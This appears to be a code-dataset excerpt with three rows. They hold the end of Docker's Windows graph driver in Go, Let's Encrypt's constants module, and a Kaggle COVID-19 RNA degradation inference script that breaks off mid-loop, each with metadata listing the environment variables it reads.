if err := os.Rename(layerPath, tmpLayerPath); err != nil && !os.IsNotExist(err) {
return err
}
if err := hcsshim.DestroyLayer(d.info, tmpID); err != nil {
logrus.Errorf("Failed to DestroyLayer %s: %s", id, err)
}
return nil
}
// Get returns the rootfs path for the id. This will mount the dir at its given path.
func (d *Driver) Get(id, mountLabel string) (string, error) {
panicIfUsedByLcow()
logrus.Debugf("WindowsGraphDriver Get() id %s mountLabel %s", id, mountLabel)
var dir string
rID, err := d.resolveID(id)
if err != nil {
return "", err
}
if count := d.ctr.Increment(rID); count > 1 {
return d.cache[rID], nil
}
// Getting the layer paths must be done outside of the lock.
layerChain, err := d.getLayerChain(rID)
if err != nil {
d.ctr.Decrement(rID)
return "", err
}
if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
d.ctr.Decrement(rID)
return "", err
}
if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
d.ctr.Decrement(rID)
if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
logrus.Warnf("Failed to Deactivate %s: %s", id, err)
}
return "", err
}
mountPath, err := hcsshim.GetLayerMountPath(d.info, rID)
if err != nil {
d.ctr.Decrement(rID)
if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
logrus.Warnf("Failed to Unprepare %s: %s", id, err)
}
if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
logrus.Warnf("Failed to Deactivate %s: %s", id, err)
}
return "", err
}
d.cacheMu.Lock()
d.cache[rID] = mountPath
d.cacheMu.Unlock()
// If the layer has a mount path, use that. Otherwise, use the
// folder path.
if mountPath != "" {
dir = mountPath
} else {
dir = d.dir(id)
}
return dir, nil
}
// Put adds a new layer to the driver.
func (d *Driver) Put(id string) error {
panicIfUsedByLcow()
logrus.Debugf("WindowsGraphDriver Put() id %s", id)
rID, err := d.resolveID(id)
if err != nil {
return err
}
if count := d.ctr.Decrement(rID); count > 0 {
return nil
}
d.cacheMu.Lock()
_, exists := d.cache[rID]
delete(d.cache, rID)
d.cacheMu.Unlock()
// If the cache was not populated, then the layer was left unprepared and deactivated
if !exists {
return nil
}
if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
return err
}
return hcsshim.DeactivateLayer(d.info, rID)
}
// Cleanup ensures the information the driver stores is properly removed.
// We use this opportunity to cleanup any -removing folders which may be
// still left if the daemon was killed while it was removing a layer.
func (d *Driver) Cleanup() error {
items, err := ioutil.ReadDir(d.info.HomeDir)
if err != nil {
if os.IsNotExist(err) {
return nil
}
return err
}
// Note we don't return an error below - it's possible the files
// are locked. However, next time around after the daemon exits,
// we likely will be able to to cleanup successfully. Instead we log
// warnings if there are errors.
for _, item := range items {
if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") {
if err := hcsshim.DestroyLayer(d.info, item.Name()); err != nil {
logrus.Warnf("Failed to cleanup %s: %s", item.Name(), err)
} else {
logrus.Infof("Cleaned up %s", item.Name())
}
}
}
return nil
}
// Diff produces an archive of the changes between the specified
// layer and its parent layer which may be "".
// The layer should be mounted when calling this function
func (d *Driver) Diff(id string, idMappings *idtools.IDMappings, parent string, parentMappings *idtools.IDMappings, mountLabel string) (_ io.ReadCloser, err error) {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return
}
layerChain, err := d.getLayerChain(rID)
if err != nil {
return
}
// this is assuming that the layer is unmounted
if err := hcsshim.UnprepareLayer(d.info, rID); err != nil {
return nil, err
}
prepare := func() {
if err := hcsshim.PrepareLayer(d.info, rID, layerChain); err != nil {
logrus.Warnf("Failed to Deactivate %s: %s", rID, err)
}
}
arch, err := d.exportLayer(rID, layerChain)
if err != nil {
prepare()
return
}
return ioutils.NewReadCloserWrapper(arch, func() error {
err := arch.Close()
prepare()
return err
}), nil
}
// Changes produces a list of changes between the specified layer
// and its parent layer. If parent is "", then all changes will be ADD changes.
// The layer should not be mounted when calling this function.
func (d *Driver) Changes(id string, idMappings *idtools.IDMappings, parent string, parentMappings *idtools.IDMappings, mountLabel string) ([]archive.Change, error) {
panicIfUsedByLcow()
rID, err := d.resolveID(id)
if err != nil {
return nil, err
}
parentChain, err := d.getLayerChain(rID)
if err != nil {
return nil, err
}
if err := hcsshim.ActivateLayer(d.info, rID); err != nil {
return nil, err
}
defer func() {
if err2 := hcsshim.DeactivateLayer(d.info, rID); err2 != nil {
logrus.Errorf("changes() failed to DeactivateLayer %s %s: %s", id, rID, err2)
}
}()
var changes []archive.Change
err = winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
r, err := hcsshim.NewLayerReader(d.info, id, parentChain)
if err != nil {
return err
}
defer r.Close()
for {
name, _, fileInfo, err := r.Next()
if err == io.EOF {
return nil
}
if err != nil {
return err
}
name = filepath.ToSlash(name)
if fileInfo == nil {
changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeDelete})
} else {
// Currently there is no way to tell between an add and a modify.
changes = append(changes, archive.Change{Path: name, Kind: archive.ChangeModify})
}
}
})
if err != nil {
return nil, err
}
return changes, nil
}
// ApplyDiff extracts the changeset from the given diff into the
// layer with the specified id and parent, returning the size of the
// new layer in bytes.
// The layer should not be mounted when calling this function
func (d *Driver) ApplyDiff(id string, idMappings *idtools.IDMappings, parent, mountLabel string, diff io.Reader) (int64, error) {
panicIfUsedByLcow()
var layerChain []string
if parent != "" {
rPId, err := d.resolveID(parent)
if err != nil {
return 0, err
}
parentChain, err := d.getLayerChain(rPId)
if err != nil {
return 0, err
}
parentPath, err := hcsshim.GetLayerMountPath(d.info, rPId)
if err != nil {
return 0, err
}
layerChain = append(layerChain, parentPath)
layerChain = append(layerChain, parentChain...)
}
size, err := d.importLayer(id, diff, layerChain)
if err != nil {
return 0, err
}
if err = d.setLayerChain(id, layerChain); err != nil {
return 0, err
}
return size, nil
}
// DiffSize calculates the changes between the specified layer
// and its parent and returns the size in bytes of the changes
// relative to its base filesystem directory.
func (d *Driver) DiffSize(id string, idMappings *idtools.IDMappings, parent string, parentMappings *idtools.IDMappings, mountLabel string) (size int64, err error) {
panicIfUsedByLcow()
rPId, err := d.resolveID(parent)
if err != nil {
return
}
changes, err := d.Changes(id, idMappings, rPId, parentMappings, mountLabel)
if err != nil {
return
}
layerFs, err := d.Get(id, "")
if err != nil {
return
}
defer d.Put(id)
return archive.ChangesSize(layerFs, changes), nil
}
// Metadata returns custom driver information.
func (d *Driver) Metadata(id string) (map[string]string, error) {
panicIfUsedByLcow()
m := make(map[string]string)
m["dir"] = d.dir(id)
return m, nil
}
func writeTarFromLayer(r hcsshim.LayerReader, w io.Writer) error {
t := tar.NewWriter(w)
for {
name, size, fileInfo, err := r.Next()
if err == io.EOF {
break
}
if err != nil {
return err
}
if fileInfo == nil {
// Write a whiteout file.
hdr := &tar.Header{
Name: filepath.ToSlash(filepath.Join(filepath.Dir(name), archive.WhiteoutPrefix+filepath.Base(name))),
}
err := t.WriteHeader(hdr)
if err != nil {
return err
}
} else {
err = backuptar.WriteTarFileFromBackupStream(t, r, name, size, fileInfo)
if err != nil {
return err
}
}
}
return t.Close()
}
// exportLayer generates an archive from a layer based on the given ID.
func (d *Driver) exportLayer(id string, parentLayerPaths []string) (io.ReadCloser, error) {
archive, w := io.Pipe()
go func() {
err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
r, err := hcsshim.NewLayerReader(d.info, id, parentLayerPaths)
if err != nil {
return err
}
err = writeTarFromLayer(r, w)
cerr := r.Close()
if err == nil {
err = cerr
}
return err
})
w.CloseWithError(err)
}()
return archive, nil
}
// writeBackupStreamFromTarAndSaveMutatedFiles reads data from a tar stream and
// writes it to a backup stream, and also saves any files that will be mutated
// by the import layer process to a backup location.
func writeBackupStreamFromTarAndSaveMutatedFiles(buf *bufio.Writer, w io.Writer, t *tar.Reader, hdr *tar.Header, root string) (nextHdr *tar.Header, err error) {
var bcdBackup *os.File
var bcdBackupWriter *winio.BackupFileWriter
if backupPath, ok := mutatedFiles[hdr.Name]; ok {
bcdBackup, err = os.Create(filepath.Join(root, backupPath))
if err != nil {
return nil, err
}
defer func() {
cerr := bcdBackup.Close()
if err == nil {
err = cerr
}
}()
bcdBackupWriter = winio.NewBackupFileWriter(bcdBackup, false)
defer func() {
cerr := bcdBackupWriter.Close()
if err == nil {
err = cerr
}
}()
buf.Reset(io.MultiWriter(w, bcdBackupWriter))
} else {
buf.Reset(w)
}
defer func() {
ferr := buf.Flush()
if err == nil {
err = ferr
}
}()
return backuptar.WriteBackupStreamFromTarFile(buf, t, hdr)
}
func writeLayerFromTar(r io.Reader, w hcsshim.LayerWriter, root string) (int64, error) {
t := tar.NewReader(r)
hdr, err := t.Next()
totalSize := int64(0)
buf := bufio.NewWriter(nil)
for err == nil {
base := path.Base(hdr.Name)
if strings.HasPrefix(base, archive.WhiteoutPrefix) {
name := path.Join(path.Dir(hdr.Name), base[len(archive.WhiteoutPrefix):])
err = w.Remove(filepath.FromSlash(name))
if err != nil {
return 0, err
}
hdr, err = t.Next()
} else if hdr.Typeflag == tar.TypeLink {
err = w.AddLink(filepath.FromSlash(hdr.Name), filepath.FromSlash(hdr.Linkname))
if err != nil {
return 0, err
}
hdr, err = t.Next()
} else {
var (
name string
size int64
fileInfo *winio.FileBasicInfo
)
name, size, fileInfo, err = backuptar.FileInfoFromHeader(hdr)
if err != nil {
return 0, err
}
err = w.Add(filepath.FromSlash(name), fileInfo)
if err != nil {
return 0, err
}
hdr, err = writeBackupStreamFromTarAndSaveMutatedFiles(buf, w, t, hdr, root)
totalSize += size
}
}
if err != io.EOF {
return 0, err
}
return totalSize, nil
}
// importLayer adds a new layer to the tag and graph store based on the given data.
func (d *Driver) importLayer(id string, layerData io.Reader, parentLayerPaths []string) (size int64, err error) {
if !noreexec {
cmd := reexec.Command(append([]string{"docker-windows-write-layer", d.info.HomeDir, id}, parentLayerPaths...)...)
output := bytes.NewBuffer(nil)
cmd.Stdin = layerData
cmd.Stdout = output
cmd.Stderr = output
if err = cmd.Start(); err != nil {
return
}
if err = cmd.Wait(); err != nil {
return 0, fmt.Errorf("re-exec error: %v: output: %s", err, output)
}
return strconv.ParseInt(output.String(), 10, 64)
}
return writeLayer(layerData, d.info.HomeDir, id, parentLayerPaths...)
}
// writeLayerReexec is the re-exec entry point for writing a layer from a tar file
func writeLayerReexec() {
size, err := writeLayer(os.Stdin, os.Args[1], os.Args[2], os.Args[3:]...)
if err != nil {
fmt.Fprint(os.Stderr, err)
os.Exit(1)
}
fmt.Fprint(os.Stdout, size)
}
// writeLayer writes a layer from a tar file.
func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) {
err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege})
if err != nil {
return 0, err
}
if noreexec {
defer func() {
if err := winio.DisableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}); err != nil {
// This should never happen, but just in case when in debugging mode.
// See https://github.com/docker/docker/pull/28002#discussion_r86259241 for rationale.
panic("Failed to disabled process privileges while in non re-exec mode")
}
}()
}
info := hcsshim.DriverInfo{
Flavour: filterDriver,
HomeDir: home,
}
w, err := hcsshim.NewLayerWriter(info, id, parentLayerPaths)
if err != nil {
return 0, err
}
size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id))
if err != nil {
return 0, err
}
err = w.Close()
if err != nil {
return 0, err
}
return size, nil
}
// resolveID computes the layerID information based on the given id.
func (d *Driver) resolveID(id string) (string, error) {
content, err := ioutil.ReadFile(filepath.Join(d.dir(id), "layerID"))
if os.IsNotExist(err) {
return id, nil
} else if err != nil {
return "", err
}
return string(content), nil
}
// setID stores the layerId in disk.
func (d *Driver) setID(id, altID string) error {
return ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600)
}
// getLayerChain returns the layer chain information.
func (d *Driver) getLayerChain(id string) ([]string, error) {
jPath := filepath.Join(d.dir(id), "layerchain.json")
content, err := ioutil.ReadFile(jPath)
if os.IsNotExist(err) {
return nil, nil
} else if err != nil {
return nil, fmt.Errorf("Unable to read layerchain file - %s", err)
}
var layerChain []string
err = json.Unmarshal(content, &layerChain)
if err != nil {
return nil, fmt.Errorf("Failed to unmarshall layerchain json - %s", err)
}
return layerChain, nil
}
// setLayerChain stores the layer chain information in disk.
func (d *Driver) setLayerChain(id string, chain []string) error {
content, err := json.Marshal(&chain)
if err != nil {
return fmt.Errorf("Failed to marshall layerchain json - %s", err)
}
jPath := filepath.Join(d.dir(id), "layerchain.json")
err = ioutil.WriteFile(jPath, content, 0600)
if err != nil {
return fmt.Errorf("Unable to write layerchain file - %s", err)
}
return nil
}
type fileGetCloserWithBackupPrivileges struct {
path string
}
func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser, error) {
if backupPath, ok := mutatedFiles[filename]; ok {
return os.Open(filepath.Join(fg.path, backupPath))
}
var f *os.File
// Open the file while holding the Windows backup privilege. This ensures that the
// file can be opened even if the caller does not actually have access to it according
// to the security descriptor. Also use sequential file access to avoid depleting the
// standby list - Microsoft VSO Bug Tracker #9900466
err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error {
path := longpath.AddPrefix(filepath.Join(fg.path, filename))
p, err := windows.UTF16FromString(path)
if err != nil {
return err
}
const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN
h, err := windows.CreateFile(&p[0], windows.GENERIC_READ, windows.FILE_SHARE_READ, nil, windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS|fileFlagSequentialScan, 0)
if err != nil {
return &os.PathError{Op: "open", Path: path, Err: err}
}
f = os.NewFile(uintptr(h), path)
return nil
})
return f, err
}
func (fg *fileGetCloserWithBackupPrivileges) Close() error {
return nil
}
// DiffGetter returns a FileGetCloser that can read files from the directory that
// contains files for the layer differences. Used for direct access for tar-split.
func (d *Driver) DiffGetter(id string) (graphdriver.FileGetCloser, error) {
panicIfUsedByLcow()
id, err := d.resolveID(id)
if err != nil {
return nil, err
}
return &fileGetCloserWithBackupPrivileges{d.dir(id)}, nil
}
// AdditionalImageStores returns additional image stores supported by the driver
func (d *Driver) AdditionalImageStores() []string {
return nil
}
// UpdateLayerIDMap changes ownerships in the layer's filesystem tree from
// matching those in toContainer to matching those in toHost.
func (d *Driver) UpdateLayerIDMap(id string, toContainer, toHost *idtools.IDMappings, mountLabel string) error {
return fmt.Errorf("windows doesn't support changing ID mappings")
}
type storageOptions struct {
size uint64
}
func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) {
options := storageOptions{}
// Read size to change the block device size per container.
for key, val := range storageOpt {
key := strings.ToLower(key)
switch key {
case "size":
size, err := units.RAMInBytes(val)
if err != nil {
return nil, err
}
options.size = uint64(size)
default:
return nil, fmt.Errorf("Unknown storage option: %s", key)
}
}
return &options, nil
}
|
[
"\"DOCKER_WINDOWSFILTER_NOREEXEC\""
] |
[] |
[
"DOCKER_WINDOWSFILTER_NOREEXEC"
] |
[]
|
["DOCKER_WINDOWSFILTER_NOREEXEC"]
|
go
| 1 | 0 | |
letsencrypt/constants.py
|
"""Let's Encrypt constants."""
import os
import logging
from acme import challenges
SETUPTOOLS_PLUGINS_ENTRY_POINT = "letsencrypt.plugins"
"""Setuptools entry point group name for plugins."""
CLI_DEFAULTS = dict(
config_files=[
"/etc/letsencrypt/cli.ini",
# http://freedesktop.org/wiki/Software/xdg-user-dirs/
os.path.join(os.environ.get("XDG_CONFIG_HOME", "~/.config"),
"letsencrypt", "cli.ini"),
],
verbose_count=-(logging.WARNING / 10),
server="https://acme-staging.api.letsencrypt.org/directory",
rsa_key_size=2048,
rollback_checkpoints=1,
config_dir="/etc/letsencrypt",
work_dir="/var/lib/letsencrypt",
logs_dir="/var/log/letsencrypt",
no_verify_ssl=False,
tls_sni_01_port=challenges.TLSSNI01Response.PORT,
auth_cert_path="./cert.pem",
auth_chain_path="./chain.pem",
strict_permissions=False,
)
"""Defaults for CLI flags and `.IConfig` attributes."""
RENEWER_DEFAULTS = dict(
renewer_enabled="yes",
renew_before_expiry="30 days",
deploy_before_expiry="20 days",
)
"""Defaults for renewer script."""
EXCLUSIVE_CHALLENGES = frozenset([frozenset([
challenges.TLSSNI01, challenges.HTTP01])])
"""Mutually exclusive challenges."""
ENHANCEMENTS = ["redirect", "http-header", "ocsp-stapling", "spdy"]
"""List of possible :class:`letsencrypt.interfaces.IInstaller`
enhancements.
List of expected options parameters:
- redirect: None
- http-header: TODO
- ocsp-stapling: TODO
- spdy: TODO
"""
ARCHIVE_DIR = "archive"
"""Archive directory, relative to `IConfig.config_dir`."""
CONFIG_DIRS_MODE = 0o755
"""Directory mode for ``.IConfig.config_dir`` et al."""
ACCOUNTS_DIR = "accounts"
"""Directory where all accounts are saved."""
BACKUP_DIR = "backups"
"""Directory (relative to `IConfig.work_dir`) where backups are kept."""
CSR_DIR = "csr"
"""See `.IConfig.csr_dir`."""
IN_PROGRESS_DIR = "IN_PROGRESS"
"""Directory used before a permanent checkpoint is finalized (relative to
`IConfig.work_dir`)."""
KEY_DIR = "keys"
"""Directory (relative to `IConfig.config_dir`) where keys are saved."""
LIVE_DIR = "live"
"""Live directory, relative to `IConfig.config_dir`."""
TEMP_CHECKPOINT_DIR = "temp_checkpoint"
"""Temporary checkpoint directory (relative to `IConfig.work_dir`)."""
RENEWAL_CONFIGS_DIR = "renewal"
"""Renewal configs directory, relative to `IConfig.config_dir`."""
RENEWER_CONFIG_FILENAME = "renewer.conf"
"""Renewer config file name (relative to `IConfig.config_dir`)."""
|
[] |
[] |
[
"XDG_CONFIG_HOME"
] |
[]
|
["XDG_CONFIG_HOME"]
|
python
| 1 | 0 | |
covid-19_inference.py
|
#!/usr/bin/env python
# coding: utf-8
# In[1]:
import time
import warnings
warnings.filterwarnings('ignore')
import pandas as pd, numpy as np
import math, json, gc, random, os, sys
import torch
import logging
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as data
from sklearn.model_selection import train_test_split
from catalyst.dl import SupervisedRunner
from catalyst.contrib.dl.callbacks import WandbLogger
from contextlib import contextmanager
from catalyst.dl.callbacks import AccuracyCallback, F1ScoreCallback, OptimizerCallback
#from pytorch_memlab import profile, MemReporter
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# In[2]:
def set_seed(seed: int):
random.seed(seed)
np.random.seed(seed)
os.environ["PYTHONHASHSEED"] = str(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed) # type: ignore
torch.backends.cudnn.deterministic = True # type: ignore
torch.backends.cudnn.benchmark = True # type: ignore
# In[3]:
set_seed(2020)
# In[4]:
test = pd.read_json('/kaggle/input/stanford-covid-vaccine/test.json', lines=True)
samplesub= pd.read_csv('/kaggle/input/stanford-covid-vaccine/sample_submission.csv')
# In[5]:
bpp_max=[]
bpp_mean =[]
id = test.id.values
for i in id:
probability = np.load('../input/stanford-covid-vaccine'+'/bpps/%s.npy'%i)
bpp_max.append(probability.max(-1).tolist())
bpp_mean.append(probability.mean(-1).tolist())
test['bpp_max']=bpp_max
test['bpp_mean']=bpp_mean
# In[6]:
test_public=test[test['seq_length']==107]
test_private=test[test['seq_length']==130]
# In[7]:
test_public_x=test_public.loc[:,['id','sequence','structure','predicted_loop_type','bpp_max','bpp_mean']]
test_private_x=test_private.loc[:,['id','sequence','structure','predicted_loop_type','bpp_max','bpp_mean']]
#CUDAに乗らないので、privateデータのサイズを小さくする。
test_private_x1,test_private_x2=train_test_split(test_private_x,test_size=0.5)
# In[8]:
token2int = {x:i for i, x in enumerate('().ACGUBEHIMSX')}
def preprocess_inputs_public(df, cols=['sequence', 'structure', 'predicted_loop_type']):
base_fea= np.transpose(
np.array(
df[cols]
.applymap(lambda seq: [token2int[x] for x in seq])
.values
.tolist()
),
(0, 2, 1)
)
bpps_max_fea = np.array(test_public_x['bpp_max'].to_list())[:,:,np.newaxis]
bpps_mean_fea = np.array(test_public_x['bpp_mean'].to_list())[:,:,np.newaxis]
return np.concatenate([base_fea,bpps_max_fea,bpps_mean_fea], 2)
def preprocess_inputs_private1(df, cols=['sequence', 'structure', 'predicted_loop_type']):
base_fea= np.transpose(
np.array(
df[cols]
.applymap(lambda seq: [token2int[x] for x in seq])
.values
.tolist()
),
(0, 2, 1)
)
bpps_max_fea = np.array(test_private_x1['bpp_max'].to_list())[:,:,np.newaxis]
bpps_mean_fea = np.array(test_private_x1['bpp_mean'].to_list())[:,:,np.newaxis]
return np.concatenate([base_fea,bpps_max_fea,bpps_mean_fea], 2)
def preprocess_inputs_private2(df, cols=['sequence', 'structure', 'predicted_loop_type']):
base_fea= np.transpose(
np.array(
df[cols]
.applymap(lambda seq: [token2int[x] for x in seq])
.values
.tolist()
),
(0, 2, 1)
)
bpps_max_fea = np.array(test_private_x2['bpp_max'].to_list())[:,:,np.newaxis]
bpps_mean_fea = np.array(test_private_x2['bpp_mean'].to_list())[:,:,np.newaxis]
return np.concatenate([base_fea,bpps_max_fea,bpps_mean_fea], 2)
# In[9]:
test_public_inputs = torch.from_numpy(preprocess_inputs_public(test_public_x)).to(device).float()
test_private_inputs1 = torch.from_numpy(preprocess_inputs_private1(test_private_x1)).to(device).float()
test_private_inputs2 = torch.from_numpy(preprocess_inputs_private2(test_private_x2)).to(device).float()
# In[10]:
#print('train_入力:{}\nvalue_入力:{}\ntrain_ラベル:{}\nvalue_ラベル:{}'.format(train_inputs.shape,val_inputs.shape,train_outputs.shape,val_outputs.shape))
# In[11]:
class LSTM_model(nn.Module):
def __init__(
self, seq_len=107, pred_len=68, dropout=0.5, embed_dim=100, hidden_dim=1024, hidden_layers=2
):
super(LSTM_model, self).__init__()
self.pred_len = pred_len
self.embeding = nn.Embedding(num_embeddings=len(token2int), embedding_dim=embed_dim)
self.lstm = nn.LSTM(
input_size=embed_dim * 3+2,
hidden_size=hidden_dim,
num_layers=hidden_layers,
dropout=dropout,
bidirectional=True,
batch_first=True,
)
self.linear = nn.Linear(hidden_dim * 2, 5)
def forward(self, seqs):
embed = self.embeding(seqs[:,:,0:3].long())
reshaped = torch.reshape(embed, (-1, embed.shape[1], embed.shape[2] * embed.shape[3]))
reshaped= torch.cat((reshaped,seqs[:,:,3:5]),2)
output, hidden = self.lstm(reshaped)
truncated = output[:, : self.pred_len, :]
out = self.linear(truncated)
return out
# In[12]:
class GRU_model(nn.Module):
def __init__(
self, seq_len=107, pred_len=68, dropout=0.5, embed_dim=100, hidden_dim=1024, hidden_layers=2
):
super(GRU_model, self).__init__()
self.pred_len = pred_len
self.embeding = nn.Embedding(num_embeddings=len(token2int), embedding_dim=embed_dim)
self.gru = nn.GRU(
input_size=embed_dim * 3+2,
hidden_size=hidden_dim,
num_layers=hidden_layers,
dropout=dropout,
bidirectional=True,
batch_first=True,
)
self.linear = nn.Linear(hidden_dim * 2, 5)
def forward(self, seqs):
embed = self.embeding(seqs[:,:,0:3].long())
reshaped = torch.reshape(embed, (-1, embed.shape[1], embed.shape[2] * embed.shape[3]))
reshaped= torch.cat((reshaped,seqs[:,:,3:5]),2)
output, hidden = self.gru(reshaped)
truncated = output[:, : self.pred_len, :]
out = self.linear(truncated)
return out
# In[13]:
LSTM_weights_path='../input/weight11/LSTM_ver20.pth'
def get_LSTM_model(seq_len=107, pred_len=68):
model = LSTM_model(seq_len=seq_len, pred_len=pred_len)
checkpoint = torch.load(LSTM_weights_path)
model.load_state_dict(checkpoint["model_state_dict"])
device = torch.device("cuda")
model.to(device)
model.eval()
return model
# In[14]:
GRU_weights_path='../input/weight11/GRU_ver8'
def get_GRU_model(seq_len=107, pred_len=68):
model = GRU_model(seq_len=seq_len, pred_len=pred_len)
checkpoint = torch.load(GRU_weights_path)
model.load_state_dict(checkpoint["model_state_dict"])
device = torch.device("cuda")
model.to(device)
model.eval()
return model
# In[15]:
with torch.no_grad():
model =get_LSTM_model()
prediction=model(test_public_inputs)
result_public_LSTM=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_LSTM_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs1)
result_private1_LSTM=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_LSTM_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs2)
result_private2_LSTM=prediction.to('cpu').detach().numpy().copy()
del prediction
# In[16]:
with torch.no_grad():
model =get_GRU_model()
prediction=model(test_public_inputs)
result_public_GRU=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_GRU_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs1)
result_private1_GRU=prediction.to('cpu').detach().numpy().copy()
del prediction
with torch.no_grad():
model =get_GRU_model(seq_len=130, pred_len=91)
prediction=model(test_private_inputs2)
result_private2_GRU=prediction.to('cpu').detach().numpy().copy()
del prediction
# In[17]:
df0 = pd.DataFrame(index=range(39), columns=['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',])
df0=df0.fillna(0)
# In[18]:
test_public_id=test_public['id']
idlist_public=test_public_id.values.tolist()
# In[19]:
test_private_id1=test_private_x1['id']
idlist_private1=test_private_id1.values.tolist()
idlist_private1[-5:]
# In[20]:
test_private_id2=test_private_x2['id']
idlist_private2=test_private_id2.values.tolist()
idlist_private2[:5]
# In[21]:
#無理やりソートすることに
testindex=samplesub.loc[:,['id_seqpos']]
testindex=testindex.reset_index()
# In[22]:
df1 = pd.DataFrame(result_public_LSTM[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_public[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_public_LSTM)-1):
id = idlist_public[j+1]
df2 = pd.DataFrame(result_public_LSTM[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
public_dataframe=df1
df1 = pd.DataFrame(result_private1_LSTM[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private1[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private1_LSTM)-1):
id = idlist_private1[j+1]
df2 = pd.DataFrame(result_private1_LSTM[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe1=df1
df1 = pd.DataFrame(result_private2_LSTM[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private2[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private2_LSTM)-1):
id = idlist_private2[j+1]
df2 = pd.DataFrame(result_private2_LSTM[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe2=df1
# In[23]:
merged_dataframe=pd.concat([public_dataframe,private_dataframe1,private_dataframe2])
pre_submission_LSTM=pd.merge(testindex,merged_dataframe)
# In[24]:
pre_submission_LSTM
# In[25]:
df1 = pd.DataFrame(result_public_GRU[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_public[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_public_GRU)-1):
id = idlist_public[j+1]
df2 = pd.DataFrame(result_public_GRU[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
public_dataframe=df1
df1 = pd.DataFrame(result_private1_GRU[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private1[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private1_GRU)-1):
id = idlist_private1[j+1]
df2 = pd.DataFrame(result_private1_GRU[j+1])
df2.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df2.insert(0, 'id_seqpos', 0)
df2=pd.concat([df2,df0])
for i in range(len(df2)):
df2.iloc[i,0]=id+'_{}'.format(i)
df1=pd.concat([df1,df2])
private_dataframe1=df1
df1 = pd.DataFrame(result_private2_GRU[0])
df1.columns = ['reactivity', 'deg_Mg_pH10', 'deg_pH10','deg_Mg_50C','deg_50C',]
df1.insert(0, 'id_seqpos', 0)
df1=pd.concat([df1,df0])
id=idlist_private2[0]
for i in range(len(df1)):
df1.iloc[i,0]=id+'_{}'.format(i)
for j in range (len(result_private2_GRU)-1):
id = idlist_private2[j+1]
